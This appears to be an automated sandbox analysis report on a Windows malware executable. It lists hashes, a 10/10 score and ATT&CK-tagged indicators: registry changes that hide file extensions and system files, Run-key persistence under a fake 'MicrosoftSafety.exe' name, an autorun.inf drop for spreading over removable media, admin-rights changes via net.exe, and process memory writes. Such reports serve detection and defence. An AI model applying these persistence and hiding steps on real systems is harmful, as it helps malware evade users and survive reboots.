bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941

Analysis

max time kernel
150s
max time network
67s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
05-12-2022 22:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe
Size

276KB
MD5

6cdcb0900130b5cce6a2ae36868c1d9b
SHA1

05e2afbd095a163e6fac8822ed49ca565b688b39
SHA256

bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941
SHA512

5f4cb49137167656ca482fd4e1e98c02a7e4e51a65a70a48179183e36a87fdf91e0596273255e0d931d6205fa4c187bd078aefc20ea35dd1892aff643a7d21a0
SSDEEP

1536:MPz43i6EJ02LyV3kFdp+0zI1ZBjhRDmmHeIcinLJcoHQHF3i6EJ02LyV3rE:czLyV3kF21im+YLzLyV3I

Score

10^/10

evasion persistence

Malware Config

Signatures

Modifies visibility of file extensions in Explorer 2 TTPs 15 IoCs

evasion

Hidden Files and Directories

T1158

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe

Modifies visiblity of hidden/system files in Explorer 2 TTPs 15 IoCs

evasion

Hidden Files and Directories

T1158

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Sets file to hidden 1 TTPs 6 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1158

pid	Process
1816	attrib.exe
1488	attrib.exe
1288	attrib.exe
672	attrib.exe
884	attrib.exe
1796	attrib.exe

Adds Run key to start application 2 TTPs 58 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = " C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe

Drops autorun.inf file 1 TTPs 2 IoCs

Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media

T1091

description	ioc	Process
File created	C:\autorun.inf	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe
File opened for modification	C:\autorun.inf	attrib.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies registry class 29 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f44471a0359723fa74489c55595fe6b30ee0000	cmd.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Network\SharingHandler\	reg.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff	cmd.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\MRUListEx = ffffffff	cmd.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	cmd.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 4c003100000000000c55ed7210204c6f63616c00380008000400efbe0c55cb700c55ed722a000000fe0100000000020000000000000000000000000000004c006f00630061006c00000014000000	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Network\SharingHandler	reg.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 7e0074001c004346534616003100000000000c55cb70122041707044617461000000741a595e96dfd3488d671733bcee28bac5cdfadf9f6756418947c5c76bc0b67f3c0008000400efbe0c55cb700c55cb702a000000eb0100000000020000000000000000000000000000004100700070004400610074006100000042000000	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	cmd.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = 00000000ffffffff	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	cmd.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 = 4a003100000000008a55ed4d102054656d700000360008000400efbe0c55cb708a55ed4d2a000000ff010000000002000000000000000000000000000000540065006d007000000014000000	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0	cmd.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\MRUListEx = 00000000ffffffff	cmd.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	cmd.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\NodeSlot = "1"	cmd.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	cmd.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0	cmd.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 = c6003100000000008a55ed4d16204242453739337e310000ae0008000400efbe8a55ed4d8a55ed4d2a000000772601000000090000000000000000000000000000006200620065003700390033003700620034006300330031003900380063006200660034003600610038003100370038003700350033006100360033006300390038003700340039003400640034006600330061003900370039003800640066003600350066003800610035003700630065003700310066003600390034003100000018000000	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000_Classes\Local Settings	cmd.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	cmd.exe

Runs net.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1988	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe
1988	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1988 wrote to memory of 1744	1988	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	28
PID 1988 wrote to memory of 1744	1988	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	28
PID 1988 wrote to memory of 1744	1988	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	28
PID 1988 wrote to memory of 1744	1988	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	28
PID 1988 wrote to memory of 1740	1988	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	30
PID 1988 wrote to memory of 1740	1988	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	30
PID 1988 wrote to memory of 1740	1988	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	30
PID 1988 wrote to memory of 1740	1988	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	30
PID 1988 wrote to memory of 1488	1988	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	32
PID 1988 wrote to memory of 1488	1988	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	32
PID 1988 wrote to memory of 1488	1988	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	32
PID 1988 wrote to memory of 1488	1988	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	32
PID 1988 wrote to memory of 848	1988	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	34
PID 1988 wrote to memory of 848	1988	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	34
PID 1988 wrote to memory of 848	1988	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	34
PID 1988 wrote to memory of 848	1988	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	34
PID 1988 wrote to memory of 1732	1988	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	36
PID 1988 wrote to memory of 1732	1988	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	36
PID 1988 wrote to memory of 1732	1988	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	36
PID 1988 wrote to memory of 1732	1988	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	36
PID 1744 wrote to memory of 1288	1744	cmd.exe	37
PID 1744 wrote to memory of 1288	1744	cmd.exe	37
PID 1744 wrote to memory of 1288	1744	cmd.exe	37
PID 1744 wrote to memory of 1288	1744	cmd.exe	37
PID 1732 wrote to memory of 1516	1732	cmd.exe	40
PID 1732 wrote to memory of 1516	1732	cmd.exe	40
PID 1732 wrote to memory of 1516	1732	cmd.exe	40
PID 1732 wrote to memory of 1516	1732	cmd.exe	40
PID 1988 wrote to memory of 660	1988	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	83
PID 1988 wrote to memory of 660	1988	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	83
PID 1988 wrote to memory of 660	1988	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	83
PID 1988 wrote to memory of 660	1988	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	83
PID 1988 wrote to memory of 1324	1988	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	43
PID 1988 wrote to memory of 1324	1988	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	43
PID 1988 wrote to memory of 1324	1988	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	43
PID 1988 wrote to memory of 1324	1988	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	43
PID 1988 wrote to memory of 276	1988	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	87
PID 1988 wrote to memory of 276	1988	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	87
PID 1988 wrote to memory of 276	1988	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	87
PID 1988 wrote to memory of 276	1988	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	87
PID 1988 wrote to memory of 1852	1988	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	45
PID 1988 wrote to memory of 1852	1988	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	45
PID 1988 wrote to memory of 1852	1988	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	45
PID 1988 wrote to memory of 1852	1988	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	45
PID 1988 wrote to memory of 1640	1988	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	48
